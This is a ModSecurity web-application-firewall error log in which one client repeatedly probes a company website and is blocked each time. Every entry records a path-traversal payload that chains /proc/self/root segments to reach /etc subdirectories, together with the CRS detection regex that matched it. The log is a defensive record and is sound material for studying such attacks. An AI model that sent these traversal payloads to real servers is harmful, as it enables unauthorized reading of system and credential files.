[Fri Mar 20 04:28:49.167675 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.241.31:43504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3MQF0L0L-SsrnPo4_rQAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:28:51.781152 2026] [:error] [pid 31215:tid 140411641214720] [client 74.7.241.31:43512] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3MgF0L0L-SsrnPo4_rgAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:28:57.399813 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.241.31:43522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3OTJ3M9BSuKP7CAboOwAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:28:58.719444 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.241.31:50940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3OhCii7xarUs8iHY9MAAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:01.084054 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:50948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3Pda6ubjKNq_cu4am7AAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:02.562858 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.241.31:50954] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3PhCii7xarUs8iHY9NAAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:07.344527 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:50968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3Qta6ubjKNq_cu4am9wAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:08.725268 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.241.31:46822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3RAF0L0L-SsrnPo4_ugAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:10.003114 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:46830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3RuoXxyEfFpUF8f9awgAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:11.338932 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.241.31:46832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3R_qxLDW4GITHUkS5qQAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:12.638606 2026] [:error] [pid 11167:tid 140411741927168] [client 74.7.241.31:46848] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3SPHIg5MgXLBnicPS5gAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:13.959052 2026] [:error] [pid 11167:tid 140411590858496] [client 74.7.241.31:46858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3SfHIg5MgXLBnicPS6AAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:17.509393 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.241.31:46860] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3TPHIg5MgXLBnicPS6wAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:18.872544 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.241.31:33250] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3ThCii7xarUs8iHY9QAAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:20.121616 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.241.31:33258] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3UBCii7xarUs8iHY9RAAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:21.384032 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.241.31:33274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3UfXLqtnMIWvjpaJwkgAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:22.947496 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.241.31:33284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3UvHIg5MgXLBnicPS7AAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:25.575283 2026] [:error] [pid 10189:tid 140411691570944] [client 74.7.241.31:33294] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3VTJ3M9BSuKP7CAboTQAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:26.818189 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.241.31:33306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3VvXLqtnMIWvjpaJwlAAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:29.220001 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.241.31:39720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3WRCii7xarUs8iHY9TQAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:29:31.583710 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.241.31:39728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz3W_XLqtnMIWvjpaJwlgAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
